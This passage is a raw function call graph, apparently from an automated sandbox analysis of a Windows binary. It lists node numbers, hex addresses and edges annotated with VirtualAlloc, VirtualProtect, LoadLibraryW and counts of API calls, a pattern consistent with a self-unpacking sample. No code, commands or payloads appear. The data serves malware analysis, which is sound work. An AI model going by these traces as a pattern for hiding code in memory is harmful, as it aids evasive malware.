107759->108088 108089 29291c4 12 API calls 107759->108089 108090 29269c9 25 API calls 107759->108090 108091 29629cd VirtualProtect 107759->108091 108092 29421c9 9 API calls 107759->108092 108093 29619cb 2 API calls 107759->108093 108094 29255cc 25 API calls 107759->108094 108095 29429ca VirtualProtect 107759->108095 108096 29425f4 5 API calls 107759->108096 108097 29419f7 8 API calls 107759->108097 108098 29255fe 25 API calls 107759->108098 108099 2962dfa VirtualProtect 107759->108099 108100 29271e1 25 API calls 107759->108100 108101 29269e9 27 API calls 107759->108101 108102 2941914 8 API calls 107759->108102 108103 2942917 2 API calls 107759->108103 108104 2927917 25 API calls 107759->108104 108105 296b111 2 API calls 107759->108105 108106 296191d 2 API calls 107759->108106 108107 2927d1d 25 API calls 107759->108107 108108 2928d02 13 API calls 107759->108108 108109 2923d03 45 API calls 107759->108109 108110 2928100 23 API calls 107759->108110 108111 296b100 2 API calls 107759->108111 108112 2962901 VirtualProtect 107759->108112 108113 2926d0a 29 API calls 107759->108113 108114 296150f 2 API calls 107759->108114 108115 2960d0c 4 API calls 107759->108115 108116 2925d0f 25 API calls 107759->108116 108117 2941536 11 API calls 107759->108117 108118 2940d31 15 API calls 107759->108118 108119 2941931 8 API calls 107759->108119 108120 2953139 VirtualProtect 107759->108120 108121 2926d20 29 API calls 107759->108121 108122 2962525 6 API calls 107759->108122 108123 292692a 27 API calls 107759->108123 108124 292712b 25 API calls 107759->108124 108125 292552b 25 API calls 107759->108125 108126 296b12f 2 API calls 107759->108126 108127 2928d57 15 API calls 107759->108127 108128 2953152 VirtualProtect 107759->108128 108129 2925d5b 25 API calls 107759->108129 108130 2925559 25 API calls 107759->108130 108131 2942959 2 API calls 107759->108131 108132 2927940 27 API calls 107759->108132 108133 2960976 4 API calls 107759->108133 108134 2925970 25 API calls 107759->108134 108135 2926977 27 API calls 107759->108135 108136 2940971 15 API calls 107759->108136 108137 294297e VirtualProtect 107759->108137 108138 292717e 25 API calls 107759->108138 108139 292897c 19 API calls 107759->108139 108140 292917d 11 API calls 107759->108140 108141 2962579 6 API calls 107759->108141 108142 2924566 29 API calls 107759->108142 108143 2923967 45 API calls 107759->108143 108144 2924964 29 API calls 107759->108144 108145 2927565 25 API calls 107759->108145 108146 2925965 25 API calls 107759->108146 108147 2927d6a 25 API calls 107759->108147 108148 296b16f 2 API calls 107759->108148 108149 2942d6d VirtualProtect 107759->108149 108150 292316c VirtualProtect 107759->108150 107764->107763 107765->107763 107766->107763 107767->107763 107768->107763 107769->107763 107770->107763 107771->107763 107772->107763 107773->107763 107774->107763 107775->107763 107776->107763 107777->107763 107778->107763 107779->107763 107780->107763 107781->107763 107782->107763 107783->107763 107784->107763 107785->107763 107786->107763 107787->107763 107788->107763 107789->107763 107790->107763 107791->107763 107792->107763 107793->107763 107794->107763 107795->107763 107796->107763 107797->107763 107798->107763 107799->107763 107800->107763 107801->107763 107802->107763 107803->107763 107804->107763 107805->107763 107806->107763 107807->107763 107808->107763 107809->107763 107810->107763 107811->107763 107812->107763 107813->107763 107814->107763 107815->107763 107816->107763 107817->107763 107818->107763 107819->107763 107820->107763 107821->107763 107822->107763 107823->107763 107824->107763 107825->107763 107826->107763 107827->107763 107828->107763 107829->107763 107830->107763 107831->107763 107832->107763 107833->107763 107834->107763 107835->107763 107836->107763 107837->107763 107838->107763 107839->107763 107840->107763 107841->107763 107842->107763 107843->107763 107844->107763 107845->107763 107846->107763 107847->107763 107848->107763 107849->107763 107850->107763 107851->107763 107852->107763 107853->107763 107854->107763 107855->107763 107856->107763 107857->107763 107858->107763 107859->107763 107860->107763 107861->107763 107862->107763 107863->107763 107864->107763 107865->107763 107866->107763 107867->107763 107868->107763 107869->107763 107870->107763 107871->107763 107872->107763 107873->107763 107874->107763 107875->107763 107876->107763 107877->107763 107878->107763 107879->107763 107880->107763 107881->107763 107882->107763 107883->107763 107884->107763 107885->107763 107886->107763 107887->107763 107888->107763 107889->107763 107890->107763 107891->107763 107892->107763 107893->107763 107894->107763 107895->107763 107896->107763 107897->107763 107898->107763 107899->107763 107900->107763 107901->107763 107902->107763 107903->107763 107904->107763 107905->107763 107906->107763 107907->107763 107908->107763 107909->107763 107910->107763 107911->107763 107912->107763 107913->107763 107914->107763 107915->107763 107916->107763 107917->107763 107918->107763 107919->107763 107920->107763 107921->107763 107922->107763 107923->107763 107924->107763 107925->107763 107926->107763 107927->107763 107928->107763 107929->107763 107930->107763 107931->107763 107932->107763 107933->107763 107934->107763 107935->107763 107936->107763 107937->107763 107938->107763 107939->107763 107940->107763 107941->107763 107942->107763 107943->107763 107944->107763 107945->107763 107946->107763 107947->107763 107948->107763 107949->107763 107950->107763 107951->107763 107952->107763 107953->107763 107954->107763 107955->107763 107956->107763 107957->107763 107958->107763 107959->107763 107960->107763 107961->107763 107962->107763 107963->107763 107964->107763 107965->107763 107966->107763 107967->107763 107968->107763 107969->107763 107970->107763 107971->107763 107972->107763 107973->107763 107974->107763 107975->107763 107976->107763 107977->107763 107978->107763 107979->107763 107980->107763 107981->107763 107982->107763 107983->107763 107984->107763 107985->107763 107986->107763 107987->107763 107988->107763 107989->107763 107990->107763 107991->107763 107992->107763 107993->107763 107994->107763 107995->107763 107996->107763 107997->107763 107998->107763 107999->107763 108000->107763 108001->107763 108002->107763 108003->107763 108004->107763 108005->107763 108006->107763 108007->107763 108008->107763 108009->107763 108010->107763 108011->107763 108012->107763 108013->107763 108014->107763 108015->107763 108016->107763 108017->107763 108018->107763 108019->107763 108020->107763 108021->107763 108022->107763 108023->107763 108024->107763 108025->107763 108026->107763 108027->107763 108028->107763 108029->107763 108030->107763 108031->107763 108032->107763 108033->107763 108034->107763 108035->107763 108036->107763 108037->107763 108038->107763 108039->107763 108040->107763 108041->107763 108042->107763 108043->107763 108044->107763 108045->107763 108046->107763 108047->107763 108048->107763 108049->107763 108050->107763 108051->107763 108052->107763 108053->107763 108054->107763 108055->107763 108056->107763 108057->107763 108058->107763 108059->107763 108060->107763 108061->107763 108062->107763 108063->107763 108064->107763 108065->107763 108066->107763 108067->107763 108068->107763 108069->107763 108070->107763 108071->107763 108072->107763 108073->107763 108074->107763 108075->107763 108076->107763 108077->107763 108078->107763 108079->107763 108080->107763 108081->107763 108082->107763 108083->107763 108084->107763 108085->107763 108086->107763 108087->107763 108088->107763 108089->107763 108090->107763 108091->107763 108092->107763 108093->107763 108094->107763 108095->107763 108096->107763 108097->107763 108098->107763 108099->107763 108100->107763 108101->107763 108102->107763 108103->107763 108104->107763 108105->107763 108106->107763 108107->107763 108108->107763 108109->107763 108110->107763 108111->107763 108112->107763 108113->107763 108114->107763 108115->107763 108116->107763 108117->107763 108118->107763 108119->107763 108120->107763 108121->107763 108122->107763 108123->107763 108124->107763 108125->107763 108126->107763 108127->107763 108128->107763 108129->107763 108130->107763 108131->107763 108132->107763 108133->107763 108134->107763 108135->107763 108136->107763 108137->107763 108138->107763 108139->107763 108140->107763 108141->107763 108142->107763 108143->107763 108144->107763 108145->107763 108146->107763 108147->107763 108148->107763 108149->107763 108150->107763 108163 292771c 108151->108163 108152 29282a3 108153 2927e50 VirtualAlloc 108163->108152 108163->108153 108166 29280f9 23 API calls 108163->108166 108171 2927ef1 108163->108171 108166->108171 108171->108152 108182 296bf21 108181->108182 108184 296df60 108182->108184 108185 296ca96 108182->108185 108204 29423c8 6 API calls 108203->108204 108205 29423c0 108204->108205 108231 2928b20 108218->108231 108219 2928b3e 108221 2928bc6 15 API calls 108221->108231 108229 2928d57 15 API calls 108229->108231 108231->108219 108231->108221 108231->108229 108232 2928d02 13 API calls 108231->108232 108232->108231 108249 2926ff6 108238->108249 108239 2927ef1 108240 29282a3 108239->108240 108241 2927e50 VirtualAlloc 108249->108239 108249->108240 108249->108241 108253 29280f9 23 API calls 108249->108253 108253->108239 108269 2941f18 108268->108269 108270 2942316 7 API calls 108269->108270 108272 29426d4 108269->108272 108287 29617f4 108286->108287 108289 29627e6 VirtualProtect 108287->108289 108291 2962785 108287->108291 108289->108291 108293 2942c17 VirtualProtect 108292->108293 108295 2943233 108293->108295 108295->107358 108308 292600a 108296->108308 108297 29282a3 108298 2927e50 VirtualAlloc 108308->108297 108308->108298 108311 29280f9 23 API calls 108308->108311 108315 2927ef1 108308->108315 108311->108315 108315->108297 108327 29423eb 108326->108327 108328 2942430 5 API calls 108327->108328 108333 29423f5 108327->108333 108341 292325f 108340->108341 108342 2923299 VirtualProtect 108341->108342 108345 2962826 108344->108345 108346 2963305 VirtualProtect 108345->108346 108360 2926a4a 108348->108360 108349 29282a3 108350 2927e50 VirtualAlloc 108360->108349 108360->108350 108363 29280f9 23 API calls 108360->108363 108367 2927ef1 108360->108367 108363->108367 108367->108349 108379 29287c8 VirtualAlloc 108378->108379 108381 2928a08 108379->108381 108401 29293dc 108400->108401 108402 29294df 108401->108402 108403 29294eb 108401->108403 108404 2929466 108401->108404 108421 29417f9 108420->108421 108422 2942316 7 API calls 108421->108422 108428 29426d4 108421->108428 108439 29613d7 108438->108439 108440 296150f 2 API calls 108439->108440 108441 2961505 108439->108441 108440->108441 108447 292504a 108446->108447 108481 29423eb 108480->108481 108499 2927fdb 108494->108499 108528 2928b59 108524->108528 108528->108524 108545 2928b59 108544->108545 108546 2928bc6 15 API calls 108545->108546 108547 2928d57 15 API calls 108545->108547 108548 2928d02 13 API calls 108545->108548 108549 2928d8e 108545->108549 108546->108545 108547->108545 108548->108545 108566 296afe7 108564->108566 108568 296b15c VirtualAlloc 108566->108568 108569 296b18e VirtualAlloc 108566->108569 108569->108568 108571 2941fe6 108570->108571 108572 2942316 7 API calls 108571->108572 108581 29426d4 108571->108581 108589 2940bd7 108588->108589 108590 2940dbf 108589->108590 108597 294167a 108589->108597 108618 29239e9 108614->108618 108615 2923dc4 41 API calls 108618->108615 108621 2923dcc 108618->108621 108656 2923bb1 108655->108656 108657 2923dc4 41 API calls 108656->108657 108662 2923dcc 108656->108662 108697 296dbf8 108696->108697 108698 296dc07 8 API calls 108697->108698 108713 2925abe 108712->108713 108714 2925c16 25 API calls 108713->108714 108745 29623ae 108744->108745 108746 29627e6 VirtualProtect 108745->108746 108749 2962785 108745->108749 108746->108749 108751 2962fb3 108750->108751 108752 2963305 VirtualProtect 108751->108752 108757 2928fac 108754->108757 108758 2928fbc 108757->108758 108763 29291dc 11 API calls 108757->108763 108763->108758 108780 29413b2 108779->108780 108781 29414bf 108780->108781 108782 29414c7 12 API calls 108780->108782 108782->108781 108802 29417b7 108801->108802 108803 2942316 7 API calls 108802->108803 108809 29426d4 108802->108809 108820 29417d9 108819->108820 108821 2942316 7 API calls 108820->108821 108827 29426d4 108820->108827 108838 2926dfd 108837->108838 108839 2926e0a 108838->108839 108852 2926ed8 108838->108852 108872 2941fca 108871->108872 108873 2942316 7 API calls 108872->108873 108879 29426d4 108872->108879 108891 2961a15 108889->108891 108890 2962785 108891->108890 108893 29627e6 VirtualProtect 108891->108893 108893->108890 108909 29263be 108895->108909 108896 2927ef1 108897 29282a3 108896->108897 108898 2927e50 VirtualAlloc 108909->108896 108909->108897 108909->108898 108912 29280f9 23 API calls 108909->108912 108912->108896 108926 29233e6 108925->108926 108927 2923dc4 41 API calls 108926->108927 108932 2923dcc 108926->108932 108978 2926fc9 108966->108978 108967 29282a3 108968 2927e50 VirtualAlloc 108978->108967 108978->108968 108981 29280f9 23 API calls 108978->108981 108986 2927ef1 108978->108986 108981->108986 108986->108967 108997 29417b7 108996->108997 108998 2942316 7 API calls 108997->108998 109004 29426d4 108997->109004 109015 292325f 109014->109015 109016 2923299 VirtualProtect 109015->109016 109019 296d3df 109018->109019 109026 296d420 109018->109026 109020 296d401 6 API calls 109019->109020 109024 296d613 109025 296d480 109024->109025 109026->109024 109026->109025 115552 296d5cb 10 API calls 109026->115552 109042 2922b95 109041->109042 109043 2923299 VirtualProtect 109042->109043 109046 29297b7 109045->109046 109047 2929820 5 API calls 109046->109047 109058 2961f93 109057->109058 109060 29627e6 VirtualProtect 109058->109060 109062 2962785 109058->109062 109060->109062 109073 2927b9f 109063->109073 109064 2927e50 VirtualAlloc 109073->109064 109077 29280f9 23 API calls 109073->109077 109082 2927ef1 109073->109082 109077->109082 109107 2926794 109093->109107 109094 2927ef1 109095 29282a3 109094->109095 109096 2927e50 VirtualAlloc 109107->109094 109107->109095 109107->109096 109109 29280f9 23 API calls 109107->109109 109109->109094 109124 292326b 109123->109124 109125 2923299 VirtualProtect 109124->109125 109139 2926fb9 109127->109139 109128 29282a3 109129 2927e50 VirtualAlloc 109139->109128 109139->109129 109142 29280f9 23 API calls 109139->109142 109146 2927ef1 109139->109146 109142->109146 109146->109128 109158 2926dfd 109157->109158 109159 2926e0a 109158->109159 109162 2926ed8 109158->109162 109192 2922b95 109191->109192 109193 2923299 VirtualProtect 109192->109193 109196 2922b9c 109195->109196 109197 2923299 VirtualProtect 109196->109197 109200 2941d1c 109199->109200 109201 2942316 7 API calls 109200->109201 109207 29426d4 109200->109207 109218 296de99 109217->109218 109219 296e471 5 API calls 109218->109219 109220 296e79a 109218->109220 109225 296df5b 109218->109225 109225->107358 109241 2926e93 109229->109241 109230 29282a3 109231 2927e50 VirtualAlloc 109241->109230 109241->109231 109244 29280f9 23 API calls 109241->109244 109248 2927ef1 109241->109248 109244->109248 109248->109230 109271 292726f 109259->109271 109260 29282a3 109261 2927e50 VirtualAlloc 109271->109260 109271->109261 109274 29280f9 23 API calls 109271->109274 109278 2927ef1 109271->109278 109274->109278 109278->109260 109290 2960aae 109289->109290 109291 2960dd2 109290->109291 109294 29616ca 109290->109294 109300 296127d 109299->109300 109302 29627e6 VirtualProtect 109300->109302 109304 2962785 109300->109304 109302->109304 109306 2961e6b 109305->109306 109307 2962785 109306->109307 109309 29627e6 VirtualProtect 109306->109309 109309->109307 109312 2941d28 109311->109312 109313 2942316 7 API calls 109312->109313 109319 29426d4 109312->109319 109342 2927280 109329->109342 109330 29282a3 109331 2927e50 VirtualAlloc 109342->109330 109342->109331 109344 29280f9 23 API calls 109342->109344 109348 2927ef1 109342->109348 109344->109348 109348->109330 109360 2922e69 109359->109360 109361 2923299 VirtualProtect 109360->109361 109364 296127d 109363->109364 109366 29627e6 VirtualProtect 109364->109366 109368 2962785 109364->109368 109366->109368 109370 2928ae2 109369->109370 109371 2928af1 109369->109371 109373 2928dd7 109370->109373 109377 29296a4 109370->109377 109372 2928b17 16 API calls 109371->109372 109372->109370 109388 2961680 109387->109388 109390 29627e6 VirtualProtect 109388->109390 109392 2962785 109388->109392 109390->109392 109394 2962e90 109393->109394 109395 2963305 VirtualProtect 109394->109395 109398 296208e 109397->109398 109400 29627e6 VirtualProtect 109398->109400 109402 2962785 109398->109402 109400->109402 109404 2929d64 VirtualFree 109403->109404 109405 2929d88 109404->109405 109405->107358 109407 2922e79 109406->109407 109408 2923299 VirtualProtect 109407->109408 109411 296eaa6 109410->109411 109413 296ea9a 109410->109413 109412 296eaba 2 API calls 109411->109412 109412->109413 109414 296eb78 VirtualAlloc 109413->109414 109415 296eb70 109413->109415 109414->109415 109419 2941661 8 API calls 109418->109419 109420 294165a 109419->109420 109438 2940adc 109437->109438 109439 2940dbf 109438->109439 109446 294167a 109438->109446 109469 2928660 VirtualAlloc 109463->109469 109465 2928a08 109469->109465 109488 292825e 109485->109488 109515 294246c 109509->109515 109516 294268f 109509->109516 109515->109509 109515->109516 109522 2927e63 VirtualAlloc 109521->109522 109546 2929a5b 109543->109546 109550 2962a85 109549->109550 109554 2941258 109553->109554 109572 2960a56 109571->109572 109573 2960dd2 109572->109573 109576 29616ca 109572->109576 109582 29248aa LoadLibraryW 109581->109582 109584 2924c67 LoadLibraryW 109582->109584 109585 2924c84 109582->109585 109584->109585 109630 2927254 109618->109630 109619 29282a3 109620 2927e50 VirtualAlloc 109630->109619 109630->109620 109633 29280f9 23 API calls 109630->109633 109637 2927ef1 109630->109637 109633->109637 109637->109619 109649 2923e3f 29 API calls 109648->109649 109650 2923e34 109649->109650 109687 2962971 109686->109687 109688 2963305 VirtualProtect 109687->109688 109695 292965f 109690->109695 109691 2929d64 VirtualFree 109692 2929739 109695->109691 109695->109692 109696 2929820 5 API calls 109695->109696 109715 2927230 109702->109715 109703 29282a3 109704 2927e50 VirtualAlloc 109715->109703 109715->109704 109717 29280f9 23 API calls 109715->109717 109720 2927ef1 109715->109720 109717->109720 109720->109703 109733 2926e6a 25 API calls 109732->109733 109745 2926e62 109733->109745 109764 2928a4e 109763->109764 109765 2928a7c 17 API calls 109764->109765 109784 2922e39 109783->109784 109785 2923299 VirtualProtect 109784->109785 109799 2925a47 109787->109799 109788 29282a3 109789 2927e50 VirtualAlloc 109799->109788 109799->109789 109802 29280f9 23 API calls 109799->109802 109806 2927ef1 109799->109806 109802->109806 109806->109788 109818 2961242 109817->109818 109819 296150f 2 API calls 109818->109819 109820 296124c 109818->109820 109819->109820 109826 292587b 109825->109826 109827 29282a3 109826->109827 109828 2927e50 VirtualAlloc 109826->109828 109840 29280f9 23 API calls 109826->109840 109844 2927ef1 109826->109844 109840->109844 109844->109827 109856 2928660 VirtualAlloc 109855->109856 109858 2928a08 109856->109858 109878 2923e4c 109877->109878 109879 2924c4a LoadLibraryW 109878->109879 109884 2925089 109878->109884 109915 2924e34 109914->109915 109916 2925089 109915->109916 109930 2925956 109915->109930 109949 2924e3c 109948->109949 109950 2925089 109949->109950 109965 2925956 109949->109965 109983 2941635 109982->109983 109984 294164c 9 API calls 109983->109984 109985 2941643 109983->109985 109984->109985 110003 2961242 110002->110003 110004 296150f 2 API calls 110003->110004 110005 296124c 110003->110005 110004->110005 110011 2923a0e 110010->110011 110012 2923dc4 41 API calls 110011->110012 110017 2923dcc 110011->110017 110056 2929a5b 110051->110056 110052 2929a81 VirtualFree 110055 2929c95 2 API calls 110055->110052 110056->110052 110056->110055 110058 2941e07 110057->110058 110059 2942316 7 API calls 110058->110059 110065 29426d4 110058->110065 110078 2924484 LoadLibraryW 110075->110078 110077 2924c67 LoadLibraryW 110079 2924c84 110077->110079 110078->110077 110078->110079 110113 2941a1f 110112->110113 110114 2942316 7 API calls 110113->110114 110120 29426d4 110113->110120 110131 2941268 110130->110131 110137 2941227 110130->110137 110132 2941205 110131->110132 110133 294126c 110131->110133 110138 2942316 7 API calls 110137->110138 110144 29426d4 110137->110144 110167 292761e 110154->110167 110155 29282a3 110156 2927e50 VirtualAlloc 110167->110155 110167->110156 110169 29280f9 23 API calls 110167->110169 110172 2927ef1 110167->110172 110169->110172 110172->110155 110189 2942699 110184->110189 110187 294297e VirtualProtect 110188 29426d4 110187->110188 110189->110187 110189->110188 110193 2942c32 110190->110193 110191 29431d4 VirtualProtect 110193->110191 110196 296262a 110194->110196 110199 2962567 110194->110199 110195 2962579 5 API calls 110195->110199 110197 29626fe 5 API calls 110196->110197 110200 29626a2 110196->110200 110197->110200 110198 2962589 5 API calls 110198->110199 110199->110194 110199->110195 110199->110196 110199->110198 110201 2962612 5 API calls 110199->110201 110201->110199 110207 2928a1a 110206->110207 110208 2928a7c 17 API calls 110207->110208 110227 2941e66 110226->110227 110228 2942316 7 API calls 110227->110228 110234 29426d4 110227->110234 110245 296aaf2 110244->110245 110246 296ab20 110245->110246 110247 296b20b VirtualAlloc 110245->110247 110252 2924e18 110251->110252 110253 2925089 110252->110253 110268 2925956 110252->110268 110298 2926ee5 110285->110298 110286 29282a3 110287 2927e50 VirtualAlloc 110298->110286 110298->110287 110300 29280f9 23 API calls 110298->110300 110304 2927ef1 110298->110304 110300->110304 110304->110286 110321 296e75f 110315->110321 110317 296e83b 110319 296e79a 110317->110319 110320 296ea75 3 API calls 110320->110317 110321->110317 110321->110319 110321->110320 110324 296250b 110323->110324 110325 29626a2 110323->110325 110324->110325 110326 2962525 5 API calls 110324->110326 110327 29627e6 VirtualProtect 110325->110327 110328 2962785 110325->110328 110327->110328 110349 2926302 110337->110349 110338 29282a3 110339 2927e50 VirtualAlloc 110349->110338 110349->110339 110352 29280f9 23 API calls 110349->110352 110356 2927ef1 110349->110356 110352->110356 110356->110338 110368 296bf0f 110367->110368 110370 296df60 110368->110370 110371 296ca96 110368->110371 110390 2941f0a 110389->110390 110391 2942316 7 API calls 110390->110391 110397 29426d4 110390->110397 110419 292676e 110407->110419 110408 29282a3 110409 2927e50 VirtualAlloc 110419->110408 110419->110409 110422 29280f9 23 API calls 110419->110422 110426 2927ef1 110419->110426 110422->110426 110426->110408 110438 2960d93 110437->110438 110439 2960dd2 110438->110439 110443 29616ca 110438->110443 110460 29266cc 110447->110460 110448 29282a3 110449 2927e50 VirtualAlloc 110460->110448 110460->110449 110462 29280f9 23 API calls 110460->110462 110466 2927ef1 110460->110466 110462->110466 110466->110448 110479 2961da9 110477->110479 110478 2962785 110479->110478 110481 29627e6 VirtualProtect 110479->110481 110481->110478 110484 2941d1c 110483->110484 110485 2942316 7 API calls 110484->110485 110491 29426d4 110484->110491 110502 296aeda 2 API calls 110501->110502 110511 296af0e 110508->110511 110512 296aefd VirtualAlloc 110508->110512 110511->110512 110519 292758c 110514->110519 110547 29296d5 110544->110547 110557 2962ed6 110556->110557 110561 2926eaa 110560->110561 110591 2942ec5 VirtualProtect 110590->110591 110596 2942abc 110594->110596 110595 29431d4 VirtualProtect 110596->110595 110611 29262ad 110598->110611 110599 29282a3 110600 2927e50 VirtualAlloc 110611->110599 110611->110600 110613 29280f9 23 API calls 110611->110613 110617 2927ef1 110611->110617 110613->110617 110617->110599 110629 296eaff 110628->110629 110630 296eb78 VirtualAlloc 110629->110630 110631 296eb70 110629->110631 110630->110631 110635 29632e1 110634->110635 110636 2963305 VirtualProtect 110635->110636 110640 296aac1 110638->110640 110639 296ab20 110640->110639 110642 296b20b VirtualAlloc 110640->110642 110658 2926ec2 110645->110658 110646 29282a3 110647 2927e50 VirtualAlloc 110658->110646 110658->110647 110660 29280f9 23 API calls 110658->110660 110664 2927ef1 110658->110664 110660->110664 110664->110646 110676 296274a 110675->110676 110677 29627e6 VirtualProtect 110676->110677 110679 2962785 110676->110679 110677->110679 110682 2942ec5 VirtualProtect 110681->110682 110684 2943233 110682->110684 110684->107358 110686 29296d5 110685->110686 110687 2929739 110686->110687 110689 2929820 5 API calls 110686->110689 110698 296a6bb VirtualAlloc 110697->110698 110700 296b230 110698->110700 110700->107358 110702 292828d VirtualAlloc 110701->110702 110704 2928a08 110702->110704 110724 2942ae2 110723->110724 110725 29431d4 VirtualProtect 110724->110725 110729 296aac1 110727->110729 110728 296ab20 110729->110728 110731 296b20b VirtualAlloc 110729->110731 110747 29262ad 110734->110747 110735 29282a3 110736 2927e50 VirtualAlloc 110747->110735 110747->110736 110749 29280f9 23 API calls 110747->110749 110753 2927ef1 110747->110753 110749->110753 110753->110735 110765 2941d1c 110764->110765 110766 2942316 7 API calls 110765->110766 110774 29426d4 110765->110774 110783 2941e85 110782->110783 110784 2942316 7 API calls 110783->110784 110790 29426d4 110783->110790 110802 2961ef7 110800->110802 110801 2962785 110802->110801 110804 29627e6 VirtualProtect 110802->110804 110804->110801 110816 2927aa0 110806->110816 110807 2927e50 VirtualAlloc 110816->110807 110820 29280f9 23 API calls 110816->110820 110825 2927ef1 110816->110825 110820->110825 110837 296a6a2 VirtualAlloc 110836->110837 110840 296a6e3 110836->110840 110842 296b230 110837->110842 110839 296a743 110840->110839 115635 296a9c5 VirtualAlloc VirtualAlloc VirtualAlloc VirtualAlloc 110840->115635 110842->107358 110850 29412c8 110847->110850 110851 29412d9 110847->110851 110849 29414c7 12 API calls 110849->110850 110852 29415b2 110850->110852 115638 29415bb 10 API calls 110850->115638 110851->110849 110851->110850 110871 2927598 110869->110871 110870 2927ef1 110872 29282a3 110870->110872 110871->110870 110871->110872 110873 2927e50 VirtualAlloc 110871->110873 110885 29280f9 23 API calls 110871->110885 110885->110870 110911 2927295 110899->110911 110900 29282a3 110901 2927e50 VirtualAlloc 110911->110900 110911->110901 110914 29280f9 23 API calls 110911->110914 110917 2927ef1 110911->110917 110914->110917 110917->110900 110930 29431c8 VirtualProtect 110929->110930 110932 2943233 110930->110932 110932->107358 110934 2962d0e 110933->110934 110935 2963305 VirtualProtect 110934->110935 110938 2942c55 110937->110938 110939 29431d4 VirtualProtect 110938->110939 110942 2923063 110941->110942 110943 2923299 VirtualProtect 110942->110943 110946 296b173 110945->110946 110947 296b18e VirtualAlloc 110946->110947 110952 2942c8b 110951->110952 110953 29431d4 VirtualProtect 110952->110953 110967 2925968 110955->110967 110956 29282a3 110957 2927e50 VirtualAlloc 110967->110956 110967->110957 110970 29280f9 23 API calls 110967->110970 110974 2927ef1 110967->110974 110970->110974 110974->110956 110995 2927d86 110985->110995 110986 2927e50 VirtualAlloc 110995->110986 110999 29280f9 23 API calls 110995->110999 111004 2927ef1 110995->111004 110999->111004 111016 2924c3e LoadLibraryW 111015->111016 111018 2924c67 LoadLibraryW 111016->111018 111019 2924c84 111016->111019 111018->111019 111064 292758c 111052->111064 111053 29282a3 111054 2927e50 VirtualAlloc 111064->111053 111064->111054 111067 29280f9 23 API calls 111064->111067 111071 2927ef1 111064->111071 111067->111071 111071->111053 111083 292458a LoadLibraryW 111082->111083 111085 2924c67 LoadLibraryW 111083->111085 111086 2924c84 111083->111086 111085->111086 111120 2923968 111119->111120 111121 2923dc4 41 API calls 111120->111121 111126 2923dcc 111120->111126 111161 2929184 111160->111161 111162 2929251 111161->111162 111171 2929292 111161->111171 111184 2962589 5 API calls 111183->111184 111187 2962567 111184->111187 111187->111183 111207 29271a6 111195->111207 111196 29282a3 111197 2927e50 VirtualAlloc 111207->111196 111207->111197 111210 29280f9 23 API calls 111207->111210 111214 2927ef1 111207->111214 111210->111214 111214->111196 111226 292899a VirtualAlloc 111225->111226 111227 2928a08 111226->111227 111247 2940975 111246->111247 111248 2940dbf 111247->111248 111255 294167a 111247->111255 111274 29429af 111272->111274 111273 29431d4 VirtualProtect 111274->111273 111288 2925973 111276->111288 111277 29282a3 111278 2927e50 VirtualAlloc 111288->111277 111288->111278 111291 29280f9 23 API calls 111288->111291 111295 2927ef1 111288->111295 111291->111295 111295->111277 111308 292680b 111306->111308 111307 29269b6 25 API calls 111307->111308 111308->111307 111320 2926a40 111308->111320 111339 292797d 111338->111339 111355 292798d 111338->111355 111350 2927758 111339->111350 111339->111355 111340 29282a3 111341 2927e50 VirtualAlloc 111355->111340 111355->111341 111357 29280f9 23 API calls 111355->111357 111361 2927ef1 111355->111361 111357->111361 111361->111340 111373 296097c 111372->111373 111374 2960dd2 111373->111374 111377 29616ca 111373->111377 111394 292556b 111382->111394 111383 29282a3 111384 2927e50 VirtualAlloc 111394->111383 111394->111384 111397 29280f9 23 API calls 111394->111397 111401 2927ef1 111394->111401 111397->111401 111401->111383 111414 29428bd 111412->111414 111413 294297e VirtualProtect 111414->111413 111419 2953119 VirtualProtect 111418->111419 111421 29531b0 111419->111421 111421->107358 111434 292600a 111422->111434 111423 29282a3 111424 2927e50 VirtualAlloc 111434->111423 111434->111424 111437 29280f9 23 API calls 111434->111437 111440 2927ef1 111434->111440 111437->111440 111440->111423 111453 296b13a 111452->111453 111454 296b18e VirtualAlloc 111453->111454 111455 296b15c VirtualAlloc 111453->111455 111454->111455 111470 2928b59 111458->111470 111459 2928d8e 111461 2928bc6 14 API calls 111461->111470 111468 2928d57 14 API calls 111468->111470 111470->111459 111470->111461 111470->111468 111472 2928d02 13 API calls 111470->111472 111472->111470 111491 2927040 111478->111491 111479 29282a3 111480 2927e50 VirtualAlloc 111491->111479 111491->111480 111493 29280f9 23 API calls 111491->111493 111497 2927ef1 111491->111497 111493->111497 111497->111479 111520 2926016 111508->111520 111541 2962567 111538->111541 111552 292680b 111550->111552 111552->111550 111583 2953119 VirtualProtect 111582->111583 111587 2926c01 111586->111587 111623 2940b53 111620->111623 111621 2940dbf 111623->111621 111629 294167a 111623->111629 111647 29419b3 111646->111647 111648 2942316 7 API calls 111647->111648 111654 29426d4 111647->111654 111665 2925d13 111664->111665 111666 29282a3 111665->111666 111667 2927e50 VirtualAlloc 111665->111667 111679 29280f9 23 API calls 111665->111679 111683 2927ef1 111665->111683 111679->111683 111683->111666 111695 2941561 111694->111695 111697 29415b2 111695->111697 115683 29415bb 10 API calls 111695->115683 111715 296151a 111714->111715 111717 29627e6 VirtualProtect 111715->111717 111719 2962785 111715->111719 111717->111719 111721 2960d10 111720->111721 111722 2960dd2 111721->111722 111725 29616ca 111721->111725 111731 2962910 111730->111731 111732 2963305 VirtualProtect 111731->111732 111735 2926c01 111734->111735 111736 2926e0a 111735->111736 111750 2926ed8 111735->111750 111769 292812b 111768->111769 111770 29281d5 111769->111770 111773 29282a3 111769->111773 111797 296b048 111796->111797 111798 296b18e VirtualAlloc 111797->111798 111799 296b15c VirtualAlloc 111797->111799 111798->111799 111803 2928d98 111802->111803 111804 2928dd7 111803->111804 111809 29296a4 111803->111809 111819 2923d09 111818->111819 111820 2923dc4 41 API calls 111819->111820 111860 2961832 111859->111860 111861 2962785 111860->111861 111863 29627e6 VirtualProtect 111860->111863 111863->111861 111877 2927c32 111865->111877 111866 2927e50 VirtualAlloc 111867 2927ef1 111877->111866 111877->111867 111880 29280f9 23 API calls 111877->111880 111880->111867 111908 2927997 111895->111908 111896 29282a3 111897 2927e50 VirtualAlloc 111908->111896 111908->111897 111910 29280f9 23 API calls 111908->111910 111914 2927ef1 111908->111914 111910->111914 111914->111896 111926 296b114 111925->111926 111927 296b18e VirtualAlloc 111926->111927 111928 296b15c VirtualAlloc 111926->111928 111927->111928 111932 2941936 111931->111932 111933 2942316 7 API calls 111932->111933 111939 29426d4 111932->111939 111950 29428bd 111949->111950 111951 294297e VirtualProtect 111950->111951 111968 2926fe4 111955->111968 111956 2927ef1 111957 29282a3 111956->111957 111958 2927e50 